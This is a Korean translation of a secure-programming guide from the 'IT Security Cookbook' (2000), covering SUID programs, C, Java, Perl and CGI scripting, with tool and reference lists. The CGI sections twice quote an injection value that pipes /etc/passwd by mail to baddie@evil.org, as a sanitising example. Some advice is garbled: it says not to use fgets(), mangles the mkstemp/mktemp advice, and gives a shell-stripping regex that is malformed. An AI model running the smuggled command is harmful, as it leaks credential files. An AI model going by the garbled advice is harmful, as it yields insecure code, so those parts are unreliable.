• 항상 명시적으로 IFS 와 PATH 를 설정한다
• SUID & SGID 프로그램들을 피한다, 특히 SUID root. SUID 가 정말 필요하다면,
  • 절대 SUID 나 SGID 쉘 스크립트를 작성하지 말라. 이진파일 (e.g. 컴파일된 프로그램)을 사용한다. 쉘 스크립트가 인터럽트를 불가능하게 한다고 하더라도, 안전하지는 않다.
  • 가능한한 단순하고 작게, 반드시 SUID 이어야만 하는 명령들만을 가지고 서브프로그램을 만든다. 전체 어플리케이션이 아닌 이것만을 SUID로 한다.
  • SUID 프로그램은 누구나 실행가능할 수는 있지만, 누구나 읽을 수 있어서는 안된다. 엿보는 시선들로부터 보호되어야 한다.
  • 유효(effective) UID 를 가능한한 빨리 복원(reset)한다.
  • 인터럽트를 사용할 수 없게 하거나 핸들러를 붙여야 한다.
  • 추가적인 보호를 위해 chroot() 를 사용한다 (그리고 리턴값을 검사한다!).
• core 파일 크기를 조정하기 위한 (csh) 한계값을 정한다.
• 민감한 임시 파일이 필요하면, 이를 생성하고, 읽기-쓰기를 열고, 삭제하고 (unlink()를 통해), 그런다음에 데이타를 쓰고, 데이타를 읽고 파일을 닫는다. 파일은 파일시스템을 사용하는 다른 프로세스들 (ps 같은) 에게는 보이지 않지만, 숨겨진 공간을 차지한다. 프로그램이 종료할 때, 파일은 OS에 의해 진짜로 지워진다. 경쟁 현상 (race condition)은 없다.
• *mktemp() 보다는, 경쟁 현상이 일어날 가능성이 적은 mktemp() 를 사용한다.
• 경로(path) 검색을 허용하는 execlp() 나 execvp() 같은 시스템 호출은 사용하지 않는다.
• 가능하면 쉘을 여는 것 (즉 popen() 과 system() 으로) 은 피해야 한다. 꼭 필요하다면, 명령어의 절대 경로를 사용하고 환경변수들이 올바르게 설정되었는지 검사한다 (IFS와 같은 변수에 대한 가정은 없어야 한다).
• 필요한 경우 인터럽트를 불가능하게 한다 (e.g. 사용자가 프로그램을 백그라운드로 돌리지 못하게 한다)
• 새로운 파일을 생성할 때, lstat() 과 링크되지 않았는지 확인하고 파일이 이미 존재하는지 검사하기 위해 O_EXCL & O_CREAT 플래그를 사용한다.

New: http://www.sunworld.com/swol-08-1998/swol-08-security.html?080198a 도 참고한다. (위의 것과 비교하지는 않았지만, 좋은 소스로부터 가져왔다..) Local 사본.

개발 언어

C보다는 자바 (또는 Ada) 와 같이 보안을 의식한 언어를 사용한다. 마찬가지로 perl 보다는 tainted perl 을 사용한다. 프로그램에서 대부분의 실제 보안 취약점은 a) 잘못된 설계 (패스워드를 clear text 로 보낸다든지) 또는 b) 잘못된 프로그래밍이다. (e.g. string/stack/array overflows, wild pointers, race conditions)

자바 권고사항:

• 예외 (exception) 를 잡으면 (catch), 무시하지 말도록 한다.
• try {} catch {} finally {} 를 널리 사용한다.
• Baltimore 는 군사급의 강도를 가지는 암호화, 해싱 및 인증서 관리를 구현한 J/Crypto 라는 순수 자바 라이브러리를 제공한다. 미국 수출규제를 받지 않는다. 저자는 안전한 Applet-Proxy-Server 통신을 위해 V3를 사용해 보았다.
• 프로젝트문서의 통합 부분으로서 첫째날부터 Javadoc 을 사용한다.

C++:

• 다중 상속을 지양한다 (즉 위의 "KISS" 원칙을 참조).
• 아래의 'C' 부분도 본다.

C 권고사항:

• 문자열과 배열 길이를 검사한다!
• 버퍼 범위를 검사하지 않는 루틴을 사용하지 않는다.
  • fgets() 를 사용하지 말고 절대 gets() 는 사용하지 않는다.
  • sprintf() 말고 snprintf() 를 사용한다.
• malloc() 한 것은 모두 Free() 한다.
• 유닉스: 환경이 먼저 깨끗해지지 않은 한 popen() 이나 system() 을 사용하지 말라. execve() 를 사용한다.

Perl 권고사항:

• 스타일:
  • $_ 와 같은 디폴트 독립변수를 명시적으로 명명한다. 영어 사용을 고려한다.
  • 구현을 숨기기 위해 패키지, 모듈, 클래스를 사용한다.
  • 서브루틴 매개변수는 my 를 써서 명명한다. local 보다는 my 를 사용한다.
  • 복잡한 정규 표현식에서는 주석과 공백을 사용한다, e.g. s substitution 에 x modifier를 사용하여 (s/..../.../x).
  • 모든 Perl 스크립트들은 -w 스위치를 사용했을 때 경고없이 실행되어야 한다 (또는 쉽게 설명할 수 있는 경고만 나오게). -w 를 썼을 때 문제가 있고 당신이 알고 있는 작은 부분은 괜찮다면, 그 부분만 local ($^W)=0 으로 -w를 적용하지 않는다.
• 표준: 다른사람들이 자신의 코드를 재사용하는 팀에서 프로그램을 하는 경우:
  • 기존의, 표준 CPAN 모듈을 사용해본다 (perl/CGI를 위한 CGI.pm 같은)..
  • 로그파일에서 동일한 시간표시 형식을 사용한다.
  • 동일한 파일 헤더 (가능하면 perldoc 을 include) 와 동일한 tabbing을 사용한다.
  • 환경 변수에 대한 공격으로부터 스크립트를 보호하기 위해 다음 행 (같은 것)을 맨 윗줄에 포함시킨다:

    # --------- Perl security precautions -----------
    $ENV{'PATH'} = '/usr/bin'; # don't include "." !!
    $ENV{'SHELL'} = '/bin/sh';
    $ENV{'IFS'} = ' ';
    umask(077); # -rw- --- ---

• Perl 실행파일을 WWW 서버의 cgi-bin 에 절대 넣지 않는다.
• 변수와 함수의 올바른 선언을 보장하기 위해 strict 를 사용한다. 다양한 strict 함수를 사용할 수 있는데, 모두 코드 명확성을 향상시키며, 버그를 최소화하고 모듈성을 개선한다:
  • strict 'refs' 를 사용: 의심스러운 soft references 를 찾음.
  • strict 'vars' 를 사용: 길잃은 변수를 찾음, 따라서 모든 변수들이 my() 로 정의되거나 $package::var 로 참조되어야 함.
  • strict 'subs' 를 사용: 맨 단어를 찾음, 즉 문자열을 둘러싸는 따옴표, 함수 호출을 둘러싸는 괄호를 확인.
• 특히 cgi 및 SUID 스크립트에 대해, tainted checking 을 설정한다. Perl 이 이 모드로 시작되면, 모든 환경 변수가 오염되었다고, 즉 위험할 수 있다고 가정하여, 이 변수들이 eval(), system(), exec() 또는 piped open() 을 통해 서브프로그램으로 전달되는 것을 허용하지 않는다.Tainted Perl 을 시작하려면, #!/bin/perl -T (perl5) 또는 #!/bin/taintperl (perl4) 을 사용한다.
• 위험한 문자가 있는 환경변수를 항상 사용하기 전에 깨끗이 한다. REMOTE_USER 가 bill; mailx baddie@evil.org </etc/passwd? 이라는값을 가지고 있으면 어쩌겠는가? 위험한 문자가 있는 변수를 사용하기 전에 깨끗이 한다, e.g. remove &;'\"|*?~<>^()[]{}$\n\r;,`.
  
  유효한 메일 주소를 추출해내는 예제로:

        if ($addr =~/^([-\w.]+\@[-\w.]+)$/) {
          $addr=$1;
        } else {
          die "Strange characters in $addr";
        }

Note: 이것은 name@domain 과 맞아야 하며 name 과 domain 은 문자, 단어, 밑줄, 점 또는 하이픈을 가질 수 있다.

이 예제는 0-9를 제외한 모든 문자를 제거한다:

$value =~ tr/0-9//cd;

아래 코드는 쉘 문자를 완전히 없애지만, 어떤 경우에는 너무 많은 문자들을 없앨 수도 있다 (e.g. 쉼표와 물음표가 있는 사용자 텍스트):

$value =~ s/'\"|*?~<>^()[]{}$\n\r";,//g;

• 파이프나 외부 프로그램을 열 때:
  • 외부 프로그램을 호출할 때 (e.g. system() 호출을 이용), 독립변수 (arguments) 를 하나의 긴 문자열로 보내지 말고, 분리된 문자열들로 보낸다. 이렇게 하면, 외부 프로그램이 직접 호출되어 쉘이 시작되지 않는다. e.g. 아래줄 대신

    system "/bin/ls -l $myvariable"
    아래줄을 사용
    system "/bin/ls","-l", "$myvariable"

  • Backticks 를 사용하지 말라, 특히 tainted 변수들이 명령어의 일부로 쓰일때는. 그 대신 쉘이 호출되지 않게 하여 매개변수 해석을 피할 수 있도록 exec 에 파이프를 연다. 이를 수행하는 일반적인 함수가 아래에 보여진다.

    
          ## run_cmd() acts like system() with seperate parameters,
          ##           except that it returns the output from the command
          ##           in a list rather than to STDOUT.
          sub run_cmd {
             my (@result) = ();
             no strict;               # $pid needs to be created on the fly
    
             # "Open" forks and returns PID. Child runs exec
             # and diverts STDOUT to PIPE.
             if (not defined ($pid = open(PIPE,"-|")) ) {
                die 'run_cmd(): Unable to fork PIPE';
             }
             if ($pid) {              # this is the parent (pid=child pid)
                @result = <PIPE>;
                close PIPE
                   || die "run_cmd(): can't close PIPE @_, $!)";
             } else {                 # child: exec command and send back results
                select STDOUT; $|=1;  # no buffering
                #warn "@_"; # could print to httpd error log
                exec @_;
                die "run_cmd(): Can't exec: @_, Reason=$!";
             }
             return @result;
          }

  • 파이프 명령어에 쓸때는, 다음 방법을 사용하여 쉘을 부르지 않도록 함으로써 매개변수 해석 (interpretation) 을 피하는 것이 좋다. 다음은 Perl 사본을 분기시켜 그 사본에 파이프를 연다:

  
          open (SORT, "|-") || exec
          "/bin/sort",$myvariable;     # fork & open pipe
          while $input (@input_lines) {          # @input_lines must exist beforehand
            print SORT $input,"\n";     # send contents of $input to sort
          } 
          close SORT; 

• 만약 SUID perl 스크립트가 필요하다면, 최소한 Perl5.003 으로 업그레이드하고 suidperl을 사용 (CERT advisory CA-96.12 도 참조), 시스템에 보안홀을 열지 않도록 한다.
• 사용자들이 Perl 스크립트를 인터럽트할 수 있길 원치 않는다면, 인터럽트는 선택적으로 사용가능, 사용불가능하게 하거나 또는 처리되도록 할 수 있다. 인터럽트를 블록으로 처리하려면 지역 $SIG 을 사용한다...:

                $SIG{INT}  = 'IGNORE';       # ignore ^C
                $SIG{TSTP} = 'IGNORE';       # ignore ^Z
                $SIG{HUP}  = 'IGNORE';       # ignore kill 1
                $SIG{STOP} = 'IGNORE';       # ignore
                $SIG{QUIT} = 'IGNORE';       # ignore ^\

• Perl5 는 특정한 이름공간 (namespace)에 어떤 함수와 변수들이 "공유" 되는지 정의하는 데 사용될 수 있는 "안전" 기능을 가지고 있다. 다양한 많은 사용자들을 가지고 있으며, 웹마스터가 사용자들이 홈디렉토리에서 "안전한" Perl 스크립트들만 돌릴 수 있게 하길 원하는 웹서버를 위해 설계된 SafeCGIPerl 모듈도 있다.

        
  Use Safe; $username='billy';         # public information
        Sub do_something {
             ….
        }
        ## define restricted space
        $compartment1= new Safe 'Ugly';
        ## define what is shared to it
        $compartment1->share('&do_something');
        $compartment1->share('$username');

CGI 프로그래밍

이전 절의 모든 규칙을 따르고, 이에 덧붙여:

• 해석기 (interpreter, Perl 이나 csh 같은)를 cgi-bin 에 두지 않는다.
• GET/POST & 비밀성:
  • GET 은 CGI 스크립트에 데이타를 전달하는 가장 널리 퍼진 방법이지만, 위험을 가지고 있다: 이 데이타는 사용자에게 더 잘 보이고 HTTP_REFERER 변수를 통해 다음 웹 서버가 접근할 수도 있다. GET URLs 도 로그파일에 나타난다 (로그를 위험할 수 있게 함). POST 를 쓰면, 독립변수 (arguments) 들이 "객체"로 전달된다 (값이 있는 필드들을 가지고 있는). 따라서 어떤 경우에는 POST 가 더 나을 수 있다: 차이점을 숙지한다.
• 위험한 문자를 가지는 환경 변수는 항상 쓰기 전에 깨끗이 한다. REMOTE_USER 가 bill; mailx baddie@evil.org </etc/passwd 라는 값을 가지고 있으면 어쩌겠는가? 위험한 문자를 가지는 변수를 쓰기 전에 깨끗이 한다, e.g. remove &;'\"|*?~<>^()[]{}$\n\r;,`.
• 유닉스 서버에서 CGIWRAP 사용을 고려한다 ( ftp://ftp.cc.umr.edu/pub/cgi/cgiwrap).
• WWW 브라우저에 메시지를 출력할 때, 메시지 앞에 다음을 붙여 HTML 을 나타내는 것을 잊지 않도록 한다.
             Pragma\n
             Cache-control\n
             Context-type: text/html\n\n
• 이메일을 보낼 때, 다음 방법을 고려해 본다 ( 이 예는 netstat -rn 의 내용을 보낸다). Note: -oi 옵션은, 표시되지 않았으면 메시지를 종료시킬 행 시작의 점을 sendmail 이 무시하도록 하는 것이다.

       $to_addr='targetuser@target.com'; 
       $from_addr='me@mycompany.com'; 
       $mail_subject='web results'; 
       open (STATUS, "netstat -nr 2>&1 |") 
         || die "$0: Can't open pipe: $!"; 
       @results = <STATUS>; 
       close STATUS || die "Problem closing pipe: $!"; 
  
       open (EMAIL, "| /usr/lib/sendmail -t -oi") 
         || die "$0: Can't call sendmail, $!"; 
       ## catch SIGPIPE in this block 
       local $SIG{PIPE} = sub {die "$0:sendmail pipe
       broken."}; 
       print EMAIL "From: $from_addr\n"; 
       print EMAIL "To: $to_addr\n";
  	 print EMAIL "Subject: $mail_subject\n\n\n"; 
       print EMAIL @results; 
       close EMAIL || die "$0: Can't close pipe: $!"

• 윈도우 웹서버에서 이메일을 보낼 때, 메일 도구를 cgi-bin에 두는 경우에는 매우 조심해야 한다. Xato의 권고문을 읽어 본다, http://www.xato.net/reference/xato-122000-01.htm
• STDERR 는 http 서버 로그에 출력되는데, 이러면 CGI 스크립트를 디버깅하기 어려워질 수 있다. 위의 명령어를 CGI 스크립트에 입력함으로써 Perl 스크립트는 로그 대신 브라우저에 에러를 출력할 수 있다:

        use CGI::Carp qw(fatalsToBrowser);

클라이언트/서버 통신

RPC
Sun RPC: 18.6.6.2 를 본다. Sun의 RPC (ONC RPC 라고도 함) 는 동기 및 비동기 호출을 허용한다. 대부분의 현 어플리케이션들은 이 RPC를 표준으로 사용한다. 그러나 이것은 어떤 보안 옵션도 제공하지 않는다 (이들은 어플리케이션 레벨에서 구현되어야 한다).

가능하면 "일반" Sun RPC 보다는 Secure RPC 사용을 고려한다 (e.g. Secure NFS). RPC는 방화벽에서 걸러내기 어렵다.

NT RPC: MS 가 사용하는 DCE RPC 부분. NT 서비스에서 널리 사용.

소켓
소켓은 현재 클라이언트 서버 어플리케이션을 위한 사실상의 표준이다. 불행히도, 소켓 프로토콜 (BSD UNIX 에서 유래) 은 본질적으로 안전한 통신 지원이 없는 통신 방법이다. 어플리케이션 자체적으로 보안을 구현해야 한다.

비표준 소켓 번호의 사용: 이것은 소켓기반의 서버들에 대한 공격을 좀더 어렵게 한다. 그러나 이것은 "모호함을 통한 보안" 이며 소켓 번호가 프로그램에 할당되도록 조정하는 것이 바람직하다. 저자의 의견으로는, 이로인해 얻어지는 보안이 비표준 번호를 관리하는 법석을 떨 만한 가치가 없다.

ActiveX 프로그래밍

• CERT의 지침을 읽고 적용한다 [activeX].
• 브라우저의 ActiveX 절도 참조한다.

ASP (Active Server Pages) 프로그래밍

Jerry Connolly 의 논문 "Active Server Pages 에서의 입력 확인을 위한 최선의 지침" (Best practices for input validation with Active Server Pages) 에서 입력 확인 방법을 설명한다. http://heap.nologin.net/aspsec.html

코드 검사를 위한 도구

• ITS4 http://www.cigital.com/its4/ (좋아보임: C 에서 써봄)
• Qaudit.pl www.fakehalo.org
• Pscan http://www.striker.ottawa.on.ca/~aland/pscan/
• BFBTester http://my.ispchannel.com/~mheffner/bfbtester
• Fuzz http://fuzz.sourceforge.net
• 원격 조사 (probing)/자바 애플릿의 디컴파일 및 자바 클래스들:
  http://www.ahpah.com/cgi-bin/suid/~pah/demo.cgi
  다음 테스트 URL들을 예제로 사용할 수 있다:
  www.boran.com/security/java-outline/outline.htm
  www.boran.com/security/java-outline/Folder.class

참고자료

• 일반
  • 소프트웨어가 제대로 처신하게 하라: 버퍼 오버플로우의 기초, by Gary McGraw and John Vega
    http://www-106.ibm.com/developerworks/library/overflows/index.html
• Perl:
  • CPAN Search The ApachePerl Module List The www.perl.com Home Page Index of pubperldoc
  • Programming Perl, 2nd Edition [the camel book]; by Larry Wall et. al. : O'Reilly & Associates, ISBN 1-56592-149-6
  • CGI Programming in C and Perl; by Thomas Boutell : Addison-Wesley, ISBN 0-20142-219-0
  • Web Programming with Perl5; by Middelton, Deng & Kemp : Sams Publishing, ISBN 1-57521-112-2
  • The Perl Journal; 구독할 가치가 있다. 유머까지 곁들인 무수한 전문가들의 조언들이 있다! 온라인 에는 거의 정보가 없지만, 2년간 구독하고 지난 이슈들을 모두 구입하는데 $100 밖에 안한다.
  • The Perl-CGI FAQ (마스터는 현재 링크가 깨져 있다 여기).
  • Perl 스크립트에서의 보안 이슈:  By Jordan Dimov, John Viega
    Part I:
    http://opensourceit.earthweb.com/earthweb/cda/dlink.resource-jhtml.72.1077.|repository||softwaredev|content|article|2001|02|02|SDViegaPerlSecurity01|SDViegaPerlSecurity01~xml.0.jhtml?cda=true
    
    Part II: Perl Taint Mode
    http://opensourceit.earthweb.com/dlink.resource-jhtml.72.1077.|repository||softwaredev|content|article|2001|02|02|SDViegaPerlSecurity02|SDViegaPerlSecurity02~xml.0.jhtml?cda=true
    
• Python
  • Python: Security Aspects, by Ronald Mendell
    http://securityportal.com/articles/python20001116.html
• Crypto:
  • Applied Cryptography, 2nd edition; by Bruce Schneier : John Wiley & Sons, ISBN 0-47111-709-9. 이 책은 정통 암호학 참고서적이다 (Per은 없지만.....).
  • Crypto CD Cryptographic Libraries A comparison
• WWW
  • Lincoln Stein's WWW security FAQ, 또는 compressed FAQ 를 다운로드.
  • Best Practices for Secure Web Development, By Razvan Peteanu
    http://securityportal.com/cover/coverstory20001030.html
  • WWW 보안에 관한 이메일 리스트:
    mailto:www-security-request@nsmx.rutgers.edu body= SUBSCRIBE
    www-security YOUR_ADDR
• 자바:
  • MCP Personal Bookshelf
  • Welcome to the O'Reilly Java Center!
  • Symantec Service & Support Visual Caf?for Java 2.0 Ask a Tech
  • Doc_CodeSigning.html
  • JCRYPTO JSSL
  • KonaSoft Strong Toolkit- European Cryptography for the Java platform
  • Java Development Kit 1.1.x Java Runtime Environment 1.1.5
  • Java FAQ: Applet Security
  • JRPC Development Kit - ONC RPC and XDR for Java
  • Index of javadev servers acme src Acme
  • DevEdge Online - Zigbert and other Object Signing Tools
  • 강력한 자바 보안 라이브러리, 상업적 용도가 아니면 무료: http://security.dstc.edu.au/projects/java/release.html
    상업용: www.phaos.com
  • 자바 보안 지침: 자바를 보다 안전하게 개발하고 사용하기 http://www.securingjava.com/chapter-seven/chapter-seven-1.html
  • 자바 1.1 에서의 비밀키 노출
    by Gregory Guerin
    자바 1.1 보안 데이타베이스는 가지고 있는 모든 비밀 서명 키들을 데이타 베이스 파일을 읽을 수 있는 모든 프로그램에게 노출한다. 여기에는 사용자가 다운로드하여 신뢰하기로 결정한 서명된 애플릿도 포함된다. 서명되지 않은 애플릿들은 데이타베이스 파일에 접근권한이 없으므로 이 노출로부터 위협을 주지 않는다.
    http://www.amug.org/~glguerin/security/jdk-1.1/exposure.html
• 윈도우 2000
  • David LeBlanc 는 특정한 사용허가를 써서 어플리케이션을 시작할 수 있는 RestrictProcess.exe 어플리케이션을 생성함으로써 CreateRestrictedToken() 함수의 유용성을 보고 있다.
    http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=19814

이 문서에 대한 변경

----------------2001 ----------
05.jan'01 어플리케이션 (ActiveX 에 대한 업데이트)
----------------2000 ----------
31.Dec'00 어플리케이션 (cgi 프로그래밍: Xato ref. 추가)
15.Dec'00 어플리케이션 (코드 검사 도구)
26.Oct'00 업데이트: 자바 보안 링크. 신규: 코드 검사를 위한 도구
15.Feb'01 Perl & Win2k 프로그래밍 참고, 자바 1.1.에서의 비밀키 노출
23.Feb'01 원격 자바 조사 도구

[java1] 1996 IEEE 보안과 프라이버시에 대한 심포지움, "자바 보안: HotJava 에서 Netscape 까지 그리고 그 이상", 프린스턴 대학
[2] 버클리 대학의 두 학생이 이것을 발견. 1995년 11월.
[3] 보안 토큰은 SIMPORT.EXE 명령줄 유틸리티를 통해 한 그룹의 사용자들에게 en masse 집단으로 생성될 수 있다.
[4] Solaris 2.5 는 V8 기반이다.
[5] WordBasic 으로 쓰여진 최초? 바이러스는 1995년 8월에 인터넷에 퍼졌다. '97년 2월에는, 함부르크 대학에서 205 개의 (대부분 윈워드) 매크로 바이러스들을 보고했다. VisbualBasic 스크립트는 2000년 상황을 더욱 악화시켰다.
[activeX] "ActiveX 에서의 보안 워크샵 결과" www.CERT.org 또는로컬 사본

            IT Security Cookbook, 15 December, 2000